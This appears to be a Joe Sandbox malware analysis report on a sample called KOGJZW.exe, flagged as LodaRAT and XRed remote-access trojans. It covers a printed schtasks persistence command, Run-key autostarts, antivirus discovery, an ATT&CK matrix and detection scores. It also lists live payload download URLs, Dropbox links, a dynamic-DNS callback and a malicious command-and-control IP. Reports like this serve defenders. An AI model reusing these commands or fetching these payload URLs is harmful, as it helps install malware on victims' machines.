Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WSFDII.exe /tr C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe /sc minute /mo 1

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

2_2_0044B398

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0044BE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

2_2_0044BE31

Source: ._cache_KOGJZW.exe, VZVDVH.exe	Binary or memory string: Shell_TrayWnd
Source: ._cache_KOGJZW.exe, 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmp, VZVDVH.exe, 00000009.00000002.1455303680.000000000042E000.00000040.00000001.01000000.00000009.sdmp, VZVDVH.exe, 0000000D.00000002.1474489839.000000000042E000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_00437254 cpuid

2_2_00437254

Source: C:\Users\user\Desktop\KOGJZW.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_004340DA GetSystemTimeAsFileTime,__aulldiv,

2_2_004340DA

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_00442C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

2_2_00442C3C

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0042E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

2_2_0042E47B

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: ._cache_KOGJZW.exe, 00000002.00000002.2596944962.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

Stealing of Sensitive Information

Yara detected LodaRAT

Source: Yara match	File source: Process Memory Space: ._cache_KOGJZW.exe PID: 7832, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected XRed

Source: Yara match	File source: KOGJZW.exe, type: SAMPLE
Source: Yara match	File source: 0.0.KOGJZW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1325538739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1413662003.0000000000535000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KOGJZW.exe PID: 7592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Synaptics.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX97B8.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Source: VZVDVH.exe, 00000018.00000002.2416742334.000000000042E000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
Source: VZVDVH.exe, 00000018.00000003.2388851173.0000000004B03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_81
Source: VZVDVH.exe, 00000014.00000002.1734102063.00000000042FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_81.
Source: VZVDVH.exe, 00000009.00000003.1412816121.0000000004064000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_81S%!Zo
Source: VZVDVH.exe, 00000010.00000003.1624021916.00000000043C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_81;
Source: VZVDVH.exe, 00000015.00000003.1800777537.0000000004683000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: WIN_81[/)

Source: Yara match

File source: Process Memory Space: ._cache_KOGJZW.exe PID: 7832, type: MEMORYSTR

Remote Access Functionality

Yara detected LodaRAT

Source: Yara match	File source: Process Memory Space: ._cache_KOGJZW.exe PID: 7832, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected XRed

Source: Yara match	File source: KOGJZW.exe, type: SAMPLE
Source: Yara match	File source: 0.0.KOGJZW.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1325538739.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1413662003.0000000000535000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KOGJZW.exe PID: 7592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Synaptics.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Synaptics\RCX97B8.tmp, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\~$cache1, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_004691DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	2_2_004691DC
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_00446675 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,	2_2_00446675
Source: C:\Users\user\Desktop\._cache_KOGJZW.exe	Code function: 2_2_004696E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_004696E2
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003D91DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	9_2_003D91DC
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003B6675 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,	9_2_003B6675
Source: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	Code function: 9_2_003D96E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	9_2_003D96E2

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	421 Scripting	2 Valid Accounts	11 Windows Management Instrumentation	421 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	1 Replication Through Removable Media	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Peripheral Device Discovery	Remote Desktop Protocol	21 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	2 Valid Accounts	1 Extra Window Memory Injection	21 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	2 Valid Accounts	1 Software Packing	NTDS	38 System Information Discovery	Distributed Component Object Model	Input Capture	34 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	21 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	12 Process Injection	1 Extra Window Memory Injection	Cached Domain Credentials	171 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	12 Masquerading	DCSync	31 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	21 Registry Run Keys / Startup Folder	2 Valid Accounts	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	31 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	12 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
KOGJZW.exe	89%	Virustotal		Browse
KOGJZW.exe	92%	ReversingLabs	Win32.Trojan.Synaptics
KOGJZW.exe	100%	Avira	TR/Dldr.Agent.SH
KOGJZW.exe	100%	Avira	W2000M/Dldr.Agent.17651006
KOGJZW.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\Synaptics\RCX97B8.tmp	100%	Avira	TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\RCX97B8.tmp	100%	Avira	W2000M/Dldr.Agent.17651006
C:\Users\user\AppData\Local\Temp\WSFDII.vbs	100%	Avira	VBS/Runner.VPJI
C:\ProgramData\Synaptics\Synaptics.exe	100%	Avira	TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\Synaptics.exe	100%	Avira	W2000M/Dldr.Agent.17651006
C:\Users\user\Documents\~$cache1	100%	Avira	TR/Dldr.Agent.SH
C:\Users\user\Documents\~$cache1	100%	Avira	W2000M/Dldr.Agent.17651006
C:\Users\user\Desktop\._cache_KOGJZW.exe	100%	Joe Sandbox ML
C:\ProgramData\Synaptics\RCX97B8.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	100%	Joe Sandbox ML
C:\ProgramData\Synaptics\Synaptics.exe	100%	Joe Sandbox ML
C:\Users\user\Documents\~$cache1	100%	Joe Sandbox ML
C:\ProgramData\Synaptics\Synaptics.exe	92%	ReversingLabs	Win32.Trojan.Synaptics
C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe	50%	ReversingLabs	Win32.Trojan.Lisk
C:\Users\user\Desktop\._cache_KOGJZW.exe	50%	ReversingLabs	Win32.Trojan.Lisk

Source	Detection	Scanner	Label
https://drive.1)	0%	Avira URL Cloud	safe
https://drive.usercontent.goog:	0%	Avira URL Cloud	safe
https://drive.usercontlV	0%	Avira URL Cloud	safe
http://xred.site50.net/syn/SSLLibrary.dlD	100%	Avira URL Cloud	malware
http://xred.site50.net/syn/Synaptics.rarh	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
freedns.afraid.org	69.42.215.252	true	false	high
docs.google.com	216.58.206.46	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
drive.usercontent.google.com	142.250.184.225	true	false	high
xred.mooo.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
xred.mooo.com	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=	KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/Synaptics.rarZ	Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1	KOGJZW.exe	false		high
https://drive.1)	Synaptics.exe, 00000003.00000002.1771384181.000000000E164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/#	Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontlV	Synaptics.exe, 00000003.00000002.1744350612.0000000007135000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:	Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	Synaptics.exe, 00000003.00000002.1772723039.000000000E238000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/Synaptics.rar	KOGJZW.exe	false		high
http://xred.site50.net/syn/Synaptics.rarh	KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ip-score.com/checkip/	._cache_KOGJZW.exe, 00000002.00000002.2601593603.0000000004166000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.google.com/	Synaptics.exe, 00000003.00000002.1738664470.000000000530A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1735541837.000000000050A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1738664470.00000000052A0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlX	KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SSLLibrary.dll6	Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:	Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.usercontent.goog:	Synaptics.exe, 00000003.00000002.1771384181.000000000E164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://xred.site50.net/syn/SSLLibrary.dlD	KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1	KOGJZW.exe	false		high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1	KOGJZW.exe	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978J	Synaptics.exe, 00000003.00000002.1735541837.000000000050A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SUpdate.iniZ	Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SUpdate.ini	KOGJZW.exe	false		high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16	Synaptics.exe, 00000003.00000002.1736544630.0000000002180000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.google.com/uc?id=0;	Synaptics.exe, 00000003.00000002.1765154169.000000000AA7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1794816357.000000001557E000.00000004.00000010.00020000.00000000.sdmp	false		high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978x	KOGJZW.exe, 00000000.00000003.1335354251.0000000002420000.00000004.00001000.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/1	Synaptics.exe, 00000003.00000002.1735541837.0000000000565000.00000004.00000020.00020000.00000000.sdmp	false		high
http://xred.site50.net/syn/SSLLibrary.dll	KOGJZW.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.184.225	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
172.111.138.100	unknown	United States	3223	VOXILITYGB	true
216.58.206.46	docs.google.com	United States	15169	GOOGLEUS	false
69.42.215.252	freedns.afraid.org	United States	17048	AWKNET-LLCUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582338
Start date and time:	2024-12-30 11:24:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	KOGJZW.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@23/46@7/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 87 Number of non-executed functions: 286
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 184.28.90.27, 52.182.143.209, 52.168.117.173, 13.107.246.45, 20.190.159.64, 172.202.163.200, 173.222.162.55
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, www.bing.com, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, onedscolprdcus07.centralus.cloudapp.azure.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, uks-azsc-config.officeapps.live.com
Execution Graph export aborted for target Synaptics.exe, PID 7936 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:25:23	API Interceptor	242x Sleep call for process: Synaptics.exe modified
05:25:55	API Interceptor	1x Sleep call for process: WerFault.exe modified
05:27:20	API Interceptor	10x Sleep call for process: splwow64.exe modified
11:25:18	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WSFDII "C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe"
11:25:19	Task Scheduler	Run new task: WSFDII.exe path: C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe
11:25:27	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
11:25:35	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WSFDII "C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe"
11:25:43	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WSFDII.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.111.138.100	222.exe	Get hash	malicious	LodaRAT, XRed	Browse
	mmi8nLybam.exe	Get hash	malicious	LodaRAT	Browse
	Supplier 0202AW-PER2 Sheet.exe	Get hash	malicious	LodaRAT, XRed	Browse
	Purchase Order No. G02873362-Docx.vbs	Get hash	malicious	LodaRAT, XRed	Browse
	New PO - Supplier 0202AW-PER2.exe	Get hash	malicious	LodaRAT, XRed	Browse
	RNEQTT.exe	Get hash	malicious	LodaRAT, XRed	Browse
	Bank Information Details.bat	Get hash	malicious	LodaRAT, XRed	Browse
	Purchase Order Supplies.Pdf.exe	Get hash	malicious	LodaRAT	Browse
	bf-p2b.exe	Get hash	malicious	LodaRAT	Browse
	gry.exe	Get hash	malicious	Unknown	Browse
69.42.215.252	222.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	Supplier 0202AW-PER2 Sheet.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	zhuzhu.exe	Get hash	malicious	GhostRat, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	Purchase Order No. G02873362-Docx.vbs	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	blq.exe	Get hash	malicious	Gh0stCringe, RunningRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	New PO - Supplier 0202AW-PER2.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	RNEQTT.exe	Get hash	malicious	LodaRAT, XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	ZmrwoZsbPp.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	ccmsetup.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
	Synaptics.exe	Get hash	malicious	XRed	Browse	freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	universityform.xlsm	Get hash	malicious	Unknown	Browse	13.107.246.45
	universityform.xlsm	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	Unknown	Browse	13.107.246.45
	installer64v9.5.7.msi	Get hash	malicious	Unknown	Browse	13.107.246.45
	zhuzhu.exe	Get hash	malicious	GhostRat, XRed	Browse	13.107.246.45
	017069451a4dbc523a1165a2f1bd361a762bb40856778.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://nemoinsure.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://1drv.ms/o/c/1ba8fd2bd98c98a8/EmMMbLWVyqxBh9Z6zxri2ZUBVkwUpSiY2KbvhupkdaFzGA?e=F6pNlD	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
freedns.afraid.org	222.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	Supplier 0202AW-PER2 Sheet.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	zhuzhu.exe	Get hash	malicious	GhostRat, XRed	Browse	69.42.215.252
	Purchase Order No. G02873362-Docx.vbs	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	blq.exe	Get hash	malicious	Gh0stCringe, RunningRAT, XRed	Browse	69.42.215.252
	New PO - Supplier 0202AW-PER2.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	RNEQTT.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	ZmrwoZsbPp.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	ccmsetup.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	Synaptics.exe	Get hash	malicious	XRed	Browse	69.42.215.252

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VOXILITYGB	222.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	mmi8nLybam.exe	Get hash	malicious	LodaRAT	Browse	172.111.138.100
	Supplier 0202AW-PER2 Sheet.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	104.250.189.221
	Purchase Order No. G02873362-Docx.vbs	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	New PO - Supplier 0202AW-PER2.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	RNEQTT.exe	Get hash	malicious	LodaRAT, XRed	Browse	172.111.138.100
	1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe	Get hash	malicious	Remcos	Browse	104.243.246.120
	nabsh4.elf	Get hash	malicious	Unknown	Browse	46.243.206.70
	7jBzTH9FXQ.exe	Get hash	malicious	Unknown	Browse	37.221.166.158
AWKNET-LLCUS	222.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	Supplier 0202AW-PER2 Sheet.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	zhuzhu.exe	Get hash	malicious	GhostRat, XRed	Browse	69.42.215.252
	Purchase Order No. G02873362-Docx.vbs	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	blq.exe	Get hash	malicious	Gh0stCringe, RunningRAT, XRed	Browse	69.42.215.252
	New PO - Supplier 0202AW-PER2.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	RNEQTT.exe	Get hash	malicious	LodaRAT, XRed	Browse	69.42.215.252
	ZmrwoZsbPp.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	ccmsetup.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	Synaptics.exe	Get hash	malicious	XRed	Browse	69.42.215.252

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	222.exe	Get hash	malicious	LodaRAT, XRed	Browse	142.250.184.225 216.58.206.46
	Supplier 0202AW-PER2 Sheet.exe	Get hash	malicious	LodaRAT, XRed	Browse	142.250.184.225 216.58.206.46
	zhuzhu.exe	Get hash	malicious	GhostRat, XRed	Browse	142.250.184.225 216.58.206.46
	setup.msi	Get hash	malicious	Unknown	Browse	142.250.184.225 216.58.206.46
	Lets-x64.exe	Get hash	malicious	Nitol, Zegost	Browse	142.250.184.225 216.58.206.46
	KL-3.1.16.exe	Get hash	malicious	Nitol, Zegost	Browse	142.250.184.225 216.58.206.46
	Whyet-4.9.exe	Get hash	malicious	Nitol, Zegost	Browse	142.250.184.225 216.58.206.46
	QQyisSetups64.exe	Get hash	malicious	GhostRat	Browse	142.250.184.225 216.58.206.46
